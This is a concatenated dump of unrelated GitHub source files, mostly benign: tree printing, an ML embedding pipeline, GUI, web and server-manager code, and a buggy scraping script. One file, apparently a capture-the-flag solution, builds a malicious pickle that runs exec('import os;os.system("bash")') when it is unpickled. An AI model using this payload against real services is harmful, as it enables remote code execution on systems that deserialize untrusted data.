x\n self.left = None\n self.right = None\n\nclass Solution(object):\n def printTree(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[str]]\n \"\"\"\n h = self.height(root)\n w = pow(2, h) - 1\n res = [['' for _ in range(w)] for __ in range(h)]\n self.print_helper(res, 0, 0, w - 1, root)\n return res\n\n def print_helper(self, lists, d, start, end, root):\n if root:\n mid = (start + end ) >> 1\n lists[d][mid] = str(root.val)\n if root.left:\n self.print_helper(lists, d + 1, start, mid - 1, root.left)\n if root.right:\n self.print_helper(lists, d + 1, mid + 1, end, root.right)\n\n def height(self, root):\n return 0 if not root else 1 + max(self.height(root.left), self.height(root.right))\n\nroot = TreeNode(1)\nroot.left = TreeNode(2)\nroot.left.left = TreeNode(3)\nroot.left.left.left = TreeNode(4)\nroot.right = TreeNode(5)\ns = Solution()\nprint(s.printTree(root))","repo_name":"denghuichao/LeetCode-py","sub_path":"PrintBinaryTree.py","file_name":"PrintBinaryTree.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37730052402","text":"from enum import Enum\nfrom typing import Any, List, Type, Union\n\nimport numpy\nfrom pydantic import BaseModel, Field\nfrom transformers.tokenization_utils_base import PaddingStrategy, TruncationStrategy\n\nfrom deepsparse import Pipeline\nfrom deepsparse.log import get_main_logger\nfrom deepsparse.transformers.helpers import truncate_transformer_onnx_model\nfrom deepsparse.transformers.pipelines import TransformersPipeline\n\n\n__all__ = [\n \"EmbeddingExtractionInput\",\n \"EmbeddingExtractionOutput\",\n \"TransformersEmbeddingExtractionPipeline\",\n]\n\n_LOGGER = get_main_logger()\n\n\nclass EmbeddingExtractionInput(BaseModel):\n \"\"\"\n Schema for inputs to transformers_embedding_extraction pipelines\n \"\"\"\n\n inputs: Union[str, List[str]] = Field(\n description=\"A list of sequences from which to get embeddings\"\n )\n\n\nclass EmbeddingExtractionOutput(BaseModel):\n \"\"\"\n Schema for transformers_embedding_extraction pipeline output.\n Values are in batch order\n \"\"\"\n\n # List[Any] is for accepting numpy arrays\n embeddings: Union[List[List[float]], List[Any]] = Field(\n description=\"The output of the model which is an embedded \"\n \"representation of the input\"\n )\n\n class Config:\n arbitrary_types_allowed = True\n\n\nclass ExtractionStrategy(str, Enum):\n \"\"\"\n Schema for supported extraction strategies\n \"\"\"\n\n per_token = \"per_token\"\n reduce_mean = \"reduce_mean\"\n reduce_max = \"reduce_max\"\n cls_token = \"cls_token\"\n\n @classmethod\n def to_list(cls) -> List[str]:\n return cls._value2member_map_\n\n\n@Pipeline.register(\n task=\"transformers_embedding_extraction\",\n task_aliases=[],\n default_model_path=(\"zoo:bert-large-wikipedia_bookcorpus-pruned90\"),\n)\nclass TransformersEmbeddingExtractionPipeline(TransformersPipeline):\n \"\"\"\n embedding extraction pipeline for extracting intermediate layer embeddings\n from transformer models\n\n example instantiation:\n ```python\n transformers_embedding_extraction_pipeline = Pipeline.create(\n task=\"transformers_embedding_extraction\",\n model_path=\"masked_language_modeling_model_dir/\",\n )\n results = transformers_embedding_extraction_pipeline(\n [\n \"the warriors have won the nba finals\"\n \"the warriors are the greatest basketball team ever\"\n ]\n )\n emb_1, emb_2 = results.embeddings\n # (expect emb_1 and emb_2 to have high cosine similiarity)\n ```\n\n :param model_path: sparsezoo stub to a transformers model or (preferred) a\n directory containing a model.onnx, tokenizer config, and model config\n :param engine_type: inference engine to use. Currently supported values include\n 'deepsparse' and 'onnxruntime'. Default is 'deepsparse'\n :param batch_size: static batch size to use for inference. Default is 1\n :param num_cores: number of CPU cores to allocate for inference engine. None\n specifies all available cores. Default is None\n :param scheduler: (deepsparse only) kind of scheduler to execute with.\n Pass None for the default\n :param input_shapes: list of shapes to set ONNX the inputs to. Pass None\n to use model as-is. Default is None\n :param alias: optional name to give this pipeline instance, useful when\n inferencing with multiple models. Default is None\n :param sequence_length: sequence length to compile model and tokenizer for.\n If a list of lengths is provided, then for each length, a model and\n tokenizer will be compiled capable of handling that sequence length\n (also known as a bucket). Default is 128\n :param emb_extraction_layer: if an int, the transformer layer number from\n which the embeddings will be extracted. If a string, the name of last\n ONNX node in model to draw embeddings from. If None, leave the model\n unchanged. Default is -1 (last transformer layer before prediction head)\n :param model_size: size of transformer model (size of hidden layer per token\n if the model is cut). Default is 768\n :param extraction_strategy: method of pooling embedding values. Currently\n supported values are 'per_token', 'reduce_mean', 'reduce_max' and 'cls_token'.\n Default is 'per_token'\n :param return_numpy: return embeddings a list of numpy arrays, list of lists\n of floats otherwise. Default is False\n :param context: context for engine. If None, then the engine will be initialized\n with 2 streams to make use of parallel inference of labels. Default is None\n \"\"\"\n\n def __init__(\n self,\n *,\n emb_extraction_layer: Union[int, str, None] = -1,\n model_size: int = 768,\n extraction_strategy: ExtractionStrategy = \"per_token\",\n return_numpy: bool = False, # to support Pydantic Validation\n **kwargs,\n ):\n self._emb_extraction_layer = emb_extraction_layer\n self._model_size = model_size\n self._extraction_strategy = extraction_strategy\n self._return_numpy = return_numpy\n\n if self._extraction_strategy not in ExtractionStrategy.to_list():\n raise ValueError(\n f\"Unsupported extraction_strategy {self._extraction_strategy}\"\n )\n\n super().__init__(**kwargs)\n\n @property\n def input_schema(self) -> Type[BaseModel]:\n \"\"\"\n :return: pydantic model class that inputs to this pipeline must comply to\n \"\"\"\n return EmbeddingExtractionInput\n\n @property\n def output_schema(self) -> Type[BaseModel]:\n \"\"\"\n :return: pydantic model class that outputs of this pipeline must comply to\n \"\"\"\n return EmbeddingExtractionOutput\n\n def setup_onnx_file_path(self) -> str:\n \"\"\"\n Performs setup done in pipeline parent class as well as truncating the\n model to an intermediate layer for embedding extraction\n\n :return: file path to the processed ONNX file for the engine to compile\n \"\"\"\n onnx_path = super().setup_onnx_file_path()\n\n if self._emb_extraction_layer is not None:\n (\n onnx_path,\n self.onnx_output_names,\n self._temp_model_directory,\n ) = truncate_transformer_onnx_model(\n onnx_path,\n emb_extraction_layer=self._emb_extraction_layer,\n hidden_layer_size=self._model_size,\n )\n else:\n _LOGGER.info(\"Skipping model truncation\")\n\n return onnx_path\n\n def parse_inputs(self, *args, **kwargs) -> BaseModel:\n \"\"\"\n :param args: ordered arguments to pipeline, either a input_schema object,\n a string text, or a list of inputs\n :param kwargs: keyword arguments to pipeline\n :return: pipeline arguments parsed into the given `input_schema`\n schema if necessary. If an instance of the `input_schema` is provided\n it will be returned\n \"\"\"\n if args and kwargs:\n raise ValueError(\n f\"{self.__class__} only support args OR kwargs. Found \"\n f\" {len(args)} args and {len(kwargs)} kwargs\"\n )\n\n if not args:\n return self.input_schema(**kwargs)\n if isinstance(args, str):\n return self.input_schema(inputs=[args[0]])\n if len(args) != 1:\n return self.input_schema(inputs=args)\n if isinstance(args[0], self.input_schema):\n return args[0]\n return self.input_schema(inputs=args[0])\n\n def process_inputs(self, inputs: EmbeddingExtractionInput) -> List[numpy.ndarray]:\n \"\"\"\n Tokenizes input\n\n :param inputs: inputs to the pipeline.\n :return: inputs of this model processed into a list of numpy arrays that\n can be directly passed into the forward pass of the pipeline engine\n \"\"\"\n if isinstance(inputs.inputs, str):\n inputs.inputs = [inputs.inputs]\n\n # tokenization matches https://github.com/texttron/tevatron\n tokens = self.tokenizer(\n inputs.inputs,\n add_special_tokens=True,\n padding=PaddingStrategy.MAX_LENGTH.value,\n truncation=TruncationStrategy.LONGEST_FIRST.value,\n return_tensors=\"np\",\n )\n\n # mask padding and cls_token\n pad_masks = tokens[\"input_ids\"] == self.tokenizer.pad_token_id\n cls_masks = tokens[\"input_ids\"] == self.tokenizer.cls_token_id\n\n return self.tokens_to_engine_input(tokens), {\n \"pad_masks\": pad_masks,\n \"cls_masks\": cls_masks,\n }\n\n def process_engine_outputs(\n self,\n engine_outputs: List[numpy.ndarray],\n pad_masks: numpy.ndarray,\n cls_masks: numpy.ndarray,\n ) -> BaseModel:\n \"\"\"\n Implements extraction_strategy from the intermediate layer and returns its value\n\n :param engine_outputs: list of numpy arrays that are the output of the engine\n forward pass\n :param pad_masks: mask of the padding token for each engine input\n :param cls_masks: mask of the cls token for each engine input\n :return: outputs of engine post-processed into an object in the `output_schema`\n format of this pipeline\n \"\"\"\n if isinstance(engine_outputs, list):\n engine_outputs = engine_outputs[0]\n\n embeddings = []\n assert len(engine_outputs) == len(pad_masks) == len(cls_masks)\n for engine_output, pad_mask, cls_mask in zip(\n engine_outputs, pad_masks, cls_masks\n ):\n # extraction strategy\n if self._extraction_strategy == ExtractionStrategy.per_token:\n embedding = engine_output\n if self._extraction_strategy == ExtractionStrategy.reduce_mean:\n masked_output = self._remove_1d_mask(\n engine_output, mask=(pad_mask | cls_mask)\n )\n embedding = masked_output.mean(axis=0)\n if self._extraction_strategy == ExtractionStrategy.reduce_max:\n masked_output = self._remove_1d_mask(\n engine_output, mask=(pad_mask | cls_mask)\n )\n embedding = masked_output.max(axis=0)\n if self._extraction_strategy == ExtractionStrategy.cls_token:\n embedding = engine_output[numpy.where(cls_mask)[0][0]]\n\n # flatten\n embedding = embedding.flatten()\n\n if not self._return_numpy:\n embedding = embedding.tolist()\n\n embeddings.append(embedding)\n\n return self.output_schema(embeddings=embeddings)\n\n @staticmethod\n def route_input_to_bucket(\n *args, input_schema: BaseModel, pipelines: List[Pipeline], **kwargs\n ) -> Pipeline:\n \"\"\"\n :param input_schema: The schema representing an input to the pipeline\n :param pipelines: Different buckets to be used\n :return: The correct Pipeline object (or Bucket) to route input to\n \"\"\"\n tokenizer = pipelines[-1].tokenizer\n tokens = tokenizer(\n input_schema.inputs,\n add_special_tokens=True,\n return_tensors=\"np\",\n padding=False,\n truncation=False,\n )\n input_seq_len = max(map(len, tokens[\"input_ids\"]))\n return TransformersPipeline.select_bucket_by_seq_len(input_seq_len, pipelines)\n\n def _remove_1d_mask(\n self, array: numpy.ndarray, mask: numpy.ndarray\n ) -> numpy.ndarray:\n # Helper function to mask out values from a 1 dimensional mask\n\n # :param array: array containing values to be masked out\n # :param mask: 1 dimensional mask\n # :return: numpy masked array\n array_masked = numpy.ma.masked_array(array)\n array_masked[mask] = numpy.ma.masked\n\n return array_masked\n","repo_name":"neuralmagic/deepsparse","sub_path":"src/deepsparse/transformers/pipelines/embedding_extraction.py","file_name":"embedding_extraction.py","file_ext":"py","file_size_in_byte":11878,"program_lang":"python","lang":"en","doc_type":"code","stars":2498,"dataset":"github-code","pt":"78"} +{"seq_id":"19888950067","text":"import os\nimport typing as t\n\n\ndef str_shape(shape: t.Sequence[int]) -> str:\n if not shape:\n raise ValueError('Shape was empty')\n return 'x'.join(str(x) for x in shape)\n\n\ndef get_key(key_name: str) -> str:\n try:\n return os.environ[key_name]\n except KeyError:\n raise KeyError(f'Environment variable {key_name} is not set') from None\n\n\ndef format_prompt(X: str, prompt: str, context: t.Optional[t.List[str]] = None) -> str:\n if '{context}' in prompt:\n if context:\n return prompt.format(context='\\n'.join(context)) + X\n else:\n raise ValueError(f'A context is required for prompt {prompt}')\n else:\n return prompt + X\n","repo_name":"SuperDuperDB/superduperdb","sub_path":"superduperdb/ext/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":377,"dataset":"github-code","pt":"78"} +{"seq_id":"30167044769","text":"#urllib基础\nimport urllib.request\n# #urlretrieve(网址,本地文件存储地址) 直接下载网页到本地\n#\n# # urllib.request.urlretrieve(\"http://www.baidu.com\",\"D:\\\\lianxi\\\\dld.html\")\n# # urllib.request.urlcleanup()\n#看网页相应的简介信息info()\nfile=urllib.request.urlopen(\"https://read.douban.com/provider/all\")\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'}\nresult = Request(file, headers=headers)\nprint(result.info())\n\n\n\n\n\nfrom urllib.request import urlopen, Request\n\nurl = \"https://read.douban.com/provider/all\"\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'}\nret = Request(url, headers=headers)\nres = urlopen(ret)\naa = res.read().decode('utf-8')\nprint(aa)\n\n\n\n\n","repo_name":"Carmans/py_study","sub_path":"dataSpide/spidy_test.py","file_name":"spidy_test.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4100118880","text":"#!/usr/bin/python -t\n\n# dfs\n\n\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param root: the root of binary tree\n @return: the length of the longest consecutive sequence path\n \"\"\"\n def longestConsecutive2(self, root):\n # write your code here\n if not root:\n return 0\n \n ret, _, _ = self.dfs(root)\n \n return ret\n \n def dfs(self, node):\n if node == None:\n return 0, 0, 0\n \n \n \n left, left_down, left_up = self.dfs(node.left)\n right, right_down, right_up = self.dfs(node.right)\n \n down, up = 0, 0\n \n if node.left and node.left.val + 1 == node.val:\n down = max(down, left_down+1)\n if node.left and node.left.val - 1 == node.val:\n up = max(up, left_up+1)\n if node.right and node.right.val + 1 == node.val:\n down = max(down, right_down+1)\n if node.right and node.right.val - 1 == node.val:\n up = max(up, right_up+1)\n \n ret = down + 1 + up\n ret = max(ret, left, right)\n \n return ret, down, up\n \n \n","repo_name":"boknowswiki/mytraning","sub_path":"lintcode/python/0614_binary_tree_longest_consecutive_sequence_II.py","file_name":"0614_binary_tree_longest_consecutive_sequence_II.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"42776481574","text":"# This is a re-purposed copy of 01_help_gui_v5\n\nfrom tkinter import *\nfrom functools import partial # To prevent unwanted windows\n\n\nclass Converter:\n def __init__(self, parent):\n # Formatting variables\n background_colour = \"#F5F6FF\" # pale blue\n\n # Converter Main Screen GUI\n self.converter_frame = Frame(width=300, height=300,\n bg=background_colour, pady=10)\n self.converter_frame.grid()\n\n # Temperature Conversion Heading (row 0)\n self.temp_converter_label = Label(self.converter_frame,\n text=\"Temperature Converter\",\n font=(\"Helvetica\", \"16\", \"bold\"),\n bg=background_colour,\n padx=10, pady=10)\n self.temp_converter_label.grid(row=0)\n\n # Export button (row 1)\n self.export_button = Button(self.converter_frame, text=\"Export\",\n font=(\"Helvetica\", \"14\"), bg=\"#97BAE8\", # dark blue\n padx=5, pady=1, command=self.export)\n self.export_button.grid(row=1)\n\n def export(self):\n get_export = Export(self)\n\n\nclass Export:\n def __init__(self, partner):\n background = \"#DAE8FC\" # light blue\n\n # disable export button\n partner.export_button.config(state=DISABLED)\n\n # sets up child window (ie: export box)\n self.export_box = Toplevel()\n\n # if users press cross at top, closes export and 'releases' export button\n self.export_box.protocol('WM_DELETE_WINDOW', partial(self.close_export,\n partner))\n\n # set up GUI Frame\n self.export_frame = Frame(self.export_box, width=300, bg=background)\n self.export_frame.grid()\n\n # set up export heading (row 0)\n self.export_heading = Label(self.export_frame,\n text=\"Export Instructions\",\n font=\"helvetica 14 bold\", bg=background)\n self.export_heading.grid(row=0)\n\n # export text (label, row 1)\n self.export_text = Label(self.export_frame,\n text=\"Enter a filename in the box below and \"\n \"press the Save button to save your \"\n \"calculation history to a text file.\",\n font=\"helvetica 10 italic\", justify=LEFT,\n width=40, bg=background, wrap=250)\n self.export_text.grid(row=1)\n\n # Warning text (label, row 2)\n self.export_text = Label(self.export_frame,\n text=\"If the filename you enter below already\"\n \" exists, it's contents will be replaced\"\n \" with your calculation history.\",\n font=\"helvetica 10 bold\", justify=LEFT,\n fg=\"#FA6800\", # text is orange\n width=40, bg=\"#FADAC8\", # background is pale orange\n wrap=250, padx=10, pady=10)\n self.export_text.grid(row=2)\n\n # Filename Entry box (row 3)\n self.filename_entry = Entry(self.export_frame, width=20,\n font=\"helvetica 14\", justify=CENTER)\n self.filename_entry.grid(row=3, pady=10)\n\n # Save / Cancel frame (row 4)\n self.save_cancel_frame = Frame(self.export_frame)\n self.save_cancel_frame.grid(row=4, pady=10)\n\n # Save and Cancel button\n self.save_button = Button(self.save_cancel_frame, text=\"Save\",\n font=\"helvetica 14\", bg=\"#97BAE8\")\n self.save_button.grid(row=0, column=0)\n\n self.cancel_button = Button(self.save_cancel_frame, text=\"Cancel\",\n font=\"helvetica 14\", bg=\"#F5F6FF\",\n command=partial(self.close_export,\n partner))\n self.cancel_button.grid(row=0, column=1)\n\n def close_export(self, partner):\n # put export button back to normal...\n partner.export_button.config(state=NORMAL)\n self.export_box.destroy()\n\n\n# main routine\nif __name__ == \"__main__\":\n root = Tk()\n root.title(\"Temperature Converter Calculator\")\n something = Converter(root)\n root.mainloop()\n","repo_name":"ummmh/Exercises","sub_path":"Temperature Converter Task/temperature_converter_task/11_export_gui_v1.py","file_name":"11_export_gui_v1.py","file_ext":"py","file_size_in_byte":4574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"9860452533","text":"from base64 import *\n\n\ndef to_binbytes(b: bytes):\n return b\"\\x8e\" + len(b).to_bytes(8, \"little\") + b\n\n\npkl_getattr = (\n b\"\\x80\\x04c__main__\\naaaa\\n0c__main__\\nbbbb\\n0c__main__\\n__builtins__.getattr\\n.\"\n)\npkl_builtins = b\"\\x80\\x04c__main__\\naaaa\\n0c__main__\\nbbbb\\n0c__main__\\n__builtins__\\n.\"\npkl = (\n b\"\\x80\\x04c__main__\\nfleg\\n0c__main__\\nflog\\n0c__main__\\nNotAPickle\\n222\"\n + to_binbytes(pkl_getattr)\n + b\"\\x85R)R\"\n + b\"p0\\n0\" # memo[0] = getattr, pop\n + to_binbytes(pkl_builtins)\n + b\"\\x85R)R\"\n + b\"p1\\n0\" # memo[1] = builtins, pop\n + b\"g0\\n\"\n + b\"g1\\n\"\n + b\"Vexec\\n\"\n + b\"\\x86R\"\n + to_binbytes(b'import os;os.system(\"bash\")')\n + b\"\\x85R\"\n + b\".\"\n)\n\n\nprint(b64encode(pkl))\n","repo_name":"maple3142/imaginaryCTF-solution","sub_path":"2021-08/frikle_pickles/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"78"} +{"seq_id":"27252055799","text":"import pandas as pd\nimport streamlit as st\nfrom data_explorer.domain.entities import Section\nfrom src.data import Dataset\nfrom src.settings import ParamsSections\nfrom src.text import TextColumn\n\n\nclass TextSection(Section):\n \"\"\"\n Class that stores the content of the text section.\n\n Attributes\n ----------\n dataset : DataSet\n Dataset object with the transformed dataframe.\n params: ParamsSections\n Object with the parameters for the datetime section.\n header : str, default = \"3. Text Column Information\"\n Section header.\n \"\"\"\n\n def __init__(\n self,\n dataset: Dataset,\n params: ParamsSections,\n header: str = \"3. Text Column Information\",\n ):\n self._name = \"Text\"\n self._header = header\n self._params = params\n self._dataset = dataset\n\n def render(self) -> None:\n \"\"\"Render the text section.\"\"\"\n\n # Header\n st.header(self._header)\n\n for n, col in enumerate(self._dataset.get_text_columns()):\n text_col = TextColumn(col, self._dataset.df[col])\n\n # Subheader\n st.subheader(f\"3.{n} Field Name: *{text_col.get_name()}*\")\n\n # Display table with metrics\n st.dataframe(\n pd.Series(\n {\n \"Number of Unique Values\": text_col.get_unique(\n self._params.DROP_NA\n ),\n \"Number of Rows with Missing Values\": text_col.get_missing(),\n \"Number of Empty Rows\": text_col.get_empty(),\n \"Number of Rows with Only Whitespace\": text_col.get_whitespace(),\n \"Number of Rows with Only Lowercases\": text_col.get_lowercase(),\n \"Number of Rows with Only Uppercases\": text_col.get_uppercase(),\n \"Number of Rows with Only Alphabet\": text_col.get_alphabet(),\n \"Number of Rows with only Digits\": text_col.get_digit(),\n \"Mode Value\": text_col.get_mode(self._params.DROP_NA),\n },\n name=\"value\",\n )\n )\n\n # Display the Bar chart\n st.plotly_chart(\n text_col.get_barchart(self._params.PLOT, self._params.DROP_NA)\n )\n\n # Display most frequent values\n st.write(\"**Most Frequent Values**\")\n st.dataframe(\n text_col.get_frequent(self._params.TOP_FREQUENCY, self._params.DROP_NA)\n )\n\n # Add a horizontal rule\n st.markdown(\"---\")\n","repo_name":"AnaMJaimeR/data_explorer_webapp","sub_path":"data_explorer/domain/sections/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10515416554","text":"\nfrom django.urls import path\nfrom . import views\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n TokenVerifyView\n)\nurlpatterns = [\n path('movies/', views.MovieApi.as_view(), name='movies'),\n path('filterMovies/', views.FilterMovieApi.as_view(), name='filterMovies'),\n path('events/', views.EventApi.as_view(), name='events'),\n path('filterEvents/', views.FilterEventApi.as_view(), name='filterEvents'),\n path('sports/', views.SportApi.as_view(), name='sports'),\n path('filterSports/', views.FilterSportApi.as_view(), name='filterSports'),\n path('activities/', views.ActivityApi.as_view(), name='activities'),\n path('filterActivities/', views.FilterActivityApi.as_view(), name='filterActivities'),\n path('search/', views.SearchApi.as_view(), name='search'),\n path('login/', views.LoginUser.as_view(), name='token_obtain_pair'),\n path('api/token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),\n path('token/verify/',TokenVerifyView.as_view(),name=\"verify_token\"),\n path('register/',views.RegisterUser.as_view(),name=\"registerUser\")\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"ridam9795/ExploreShow","sub_path":"rest_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74584852091","text":"import subprocess\nimport psutil\nimport asyncio\nimport os\n\nfrom cogs.handlers.data_handler import get_cowmaster_configuration, ConfigManagement\nfrom cogs.misc.logger import get_logger, get_misc\nfrom cogs.handlers.events import stop_event\nfrom cogs.TCP.packet_parser import GameManagerParser\n\nLOGGER = get_logger()\nMISC = get_misc()\n\nclass CowMaster:\n def __init__(self, port, global_config):\n self.port = port\n self.id = 0\n self.name = f\"{global_config['hon_data']['svr_name']}-cowmaster\"\n self.global_config = global_config\n self.enabled = False\n self.set_configuration()\n\n self.client_connection = None\n self.cowmaster_cmdline = get_cowmaster_configuration(self.global_config.get(\"hon_data\"))\n\n self.game_manager_parser = GameManagerParser(self.id, logger = LOGGER)\n \n # state variables\n self._started = None\n self._pid = None\n self._proc_hook = None\n self.status_received = asyncio.Event()\n\n self.game_state = CowState(self.id, self.config.local)\n self.reset_cowmaster_state()\n self.game_state.add_listener(self.on_game_state_change)\n\n asyncio.create_task(self.monitor_process())\n \n async def fork_new_server(self, game_server):\n if not self.client_connection:\n LOGGER.warn(\"CowMaster - Not yet established connection to manager.\")\n return\n await self.client_connection.send_packet(game_server.get_fork_bytes(), send_len=True)\n\n def set_configuration(self):\n self.config = ConfigManagement(self.id,self.global_config)\n\n async def start_cow_master(self):\n \"\"\"\n Linux only feature, the cow master is used to preload resources for each available map type.\n The cow master can then be commanded to \"fork\" new game servers, off existing resources and RAM.\n This results in instant server startup times and some significantly less RAM usage overall \n \"\"\"\n cmdline_args = MISC.build_commandline_args(self.cowmaster_cmdline, self.global_config, cowmaster = True)\n exe = subprocess.Popen(cmdline_args,close_fds=True,start_new_session=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n\n self._pid = exe.pid\n self._proc_hook = psutil.Process(pid=self._pid)\n self.enabled = True\n\n def stop_cow_master(self, disable=True):\n if self._proc_hook:\n self._proc_hook.terminate()\n self.enabled = disable\n self._pid = None\n self._proc_hook = None\n self.unset_client_connection()\n \n async def set_client_connection(self, client_connection):\n LOGGER.highlight(\"CowMaster - Connected to manager.\")\n self.client_connection = client_connection\n self._proc_hook = MISC.get_client_pid_by_tcp_source_port(self.global_config['hon_data']['svr_managerPort'], client_connection.addr[1])\n self._pid = self._proc_hook.pid\n \n def unset_client_connection(self):\n self.client_connection = None\n self._pid = None\n self._proc_hook = None\n\n async def on_game_state_change(self, key, value):\n # do things\n pass\n\n def get_port(self):\n return self.port\n \n def reset_cowmaster_state(self):\n LOGGER.debug(f\"CowMaster - Reset state\")\n self.status_received.clear()\n self.game_state.clear()\n \n async def monitor_process(self):\n LOGGER.debug(f\"CowMaster - Process monitor started\")\n try:\n while not stop_event.is_set():\n if self._proc_hook is not None:\n try:\n status = self._proc_hook.status() # Get the status of the process\n except psutil.NoSuchProcess:\n status = 'stopped'\n if status in ['zombie', 'stopped'] and self.enabled: # If the process is defunct or stopped. a \"suspended\" process will also show as stopped on windows.\n LOGGER.warn(f\"CowMaster stopped unexpectedly\")\n self._proc_hook = None # Reset the process hook reference\n self._pid = None\n self._proc_owner = None\n self.reset_cowmaster_state()\n # the below intentionally does not use self.schedule_task. The manager ends up creating the task.\n await self.start_cow_master()\n elif status != 'zombie' and not self.enabled:\n # Schedule a shutdown, otherwise if shutdown is already scheduled, skip over\n self.stop_cow_master()\n\n for _ in range(5): # Monitor process every 5 seconds\n if stop_event.is_set():\n break\n await asyncio.sleep(1)\n\n except asyncio.CancelledError:\n LOGGER.debug(f\"GameServer #{self.id} Process monitor cancelled\")\n # Propagate the cancellation\n raise\n except Exception as e:\n LOGGER.error(f\"GameServer #{self.id} Unexpected error in monitor_process: {e}\")\n\nclass CowState:\n def __init__(self, id, local_config):\n self._state = {}\n self._performance = {}\n self._listeners = []\n self.id = id\n self.local_config = local_config\n\n def __getitem__(self, key, dict_to_check=\"state\"):\n target_dict = self._state if dict_to_check == \"state\" else self._performance\n return target_dict[key]\n\n def __setitem__(self, key, value, dict_to_check=\"state\"):\n if dict_to_check == \"state\":\n self._state[key] = value\n else:\n self._performance[key] = value\n self._emit_event(key, value)\n\n def get_full_key(self, key, current_level, level=None, path=None, dict_to_check=\"state\"):\n if level is None:\n level = self._state if dict_to_check == \"state\" else self._performance\n\n if path is None:\n path = []\n\n if level is current_level:\n path.append(key)\n return \".\".join(path)\n\n for k, v in level.items():\n if isinstance(v, dict):\n new_path = path.copy()\n new_path.append(k)\n result = self.get_full_key(key, current_level, v, new_path, dict_to_check)\n if result:\n return result\n\n return None\n\n def update(self, data, current_level=None, dict_to_check=\"state\"):\n monitored_keys = [\"match_started\", \"match_info.mode\", \"game_phase\"]\n\n if current_level is None:\n current_level = self._state if dict_to_check == \"state\" else self._performance\n\n target_dict = self._state if dict_to_check == \"state\" else self._performance\n\n for key, value in data.items():\n if isinstance(value, dict):\n if key not in current_level:\n current_level[key] = {}\n self.update(value, current_level[key], dict_to_check)\n else:\n full_key = self.get_full_key(key, current_level, dict_to_check=dict_to_check)\n if full_key in monitored_keys and (full_key not in target_dict or self.__getitem__(full_key, dict_to_check) != value):\n self.__setitem__(full_key, value, dict_to_check)\n else:\n current_level[key] = value\n\n def add_listener(self, callback):\n self._listeners.append(callback)\n\n def _emit_event(self, key, value):\n for listener in self._listeners:\n asyncio.create_task(listener(key, value))\n\n def clear(self, dict_to_check=None):\n if dict_to_check is None or dict_to_check == \"state\":\n self.update({\n 'instance_id':self.id,\n 'instance_name': self.local_config['name'],\n 'local_game_port': self.local_config['params']['svr_port'],\n 'remote_game_port': self.local_config['params']['svr_proxyPort'],\n 'local_voice_port': self.local_config['params']['svr_proxyLocalVoicePort'],\n 'remote_voice_port': self.local_config['params']['svr_proxyRemoteVoicePort'],\n 'proxy_enabled': self.local_config['params']['man_enableProxy'],\n 'status': None,\n 'uptime': None,\n 'num_clients': None,\n 'match_started': None,\n 'game_phase': None,\n 'current_match_id': None,\n 'players': [],\n 'match_info':{\n 'map':None,\n 'mode':None,\n 'name':None,\n 'match_id':None,\n 'start_time': 0,\n 'duration':0\n }\n }, dict_to_check=\"state\")\n if dict_to_check is None or dict_to_check == \"performance\":\n self.update({\n \"now_ingame_skipped_frames\": 0,\n \"total_ingame_skipped_frames\": 0,\n 'skipped_frames_detailed': {}\n }, dict_to_check=\"performance\")","repo_name":"HoNfigurator/HoNfigurator-Central","sub_path":"cogs/game/cow_master.py","file_name":"cow_master.py","file_ext":"py","file_size_in_byte":9127,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"27818747275","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Signal Processing Basics\n# *Written by Luke Chang*\n# \n# In this lab, we will cover the basics of convolution, sine waves, and fourier transforms. This lab is largely based on exercises from Mike X Cohen's excellent book, [Analying Neural Data Analysis: Theory and Practice](https://www.amazon.com/Analyzing-Neural-Time-Data-Practice/dp/0262019876). If you are interested in learning in more detail about the basics of EEG and time-series analyses I highly recommend his accessible introduction. I also encourage you to watch his accompanying freely available [*lecturelets*](https://www.youtube.com/channel/UCUR_LsXk7IYyueSnXcNextQ) to learn more about each topic introduced in this notebook.\n\n# ## Time Domain\n# \n# First we will work on signals in the time domain. This requires measuring a signal at a constant interval over time. The frequency with which we measure a signal is referred to as the sampling frequency. The units of this are typically described in $Hz$ - or the number of cycles per second. It is critical that the sampling frequency is consistent over the entire measurement of the time series.\n\n# ### Dot Product\n# To understand convolution, we first need to familiarize ourselves with the dot product. The dot product is simply the sum of the elements of a vector weighted by the elements of another vector. This method is commonly used in signal processing, and also in statistics as a measure of similarity between two vectors. Finally, there is also a geometric inrepretation which is a mapping between vectors (i.e., the product of the magnitudes of the two vectors scaled by the cosine of the angle between them). For a more in depth overview of the dot product and its relation to convolution, you can 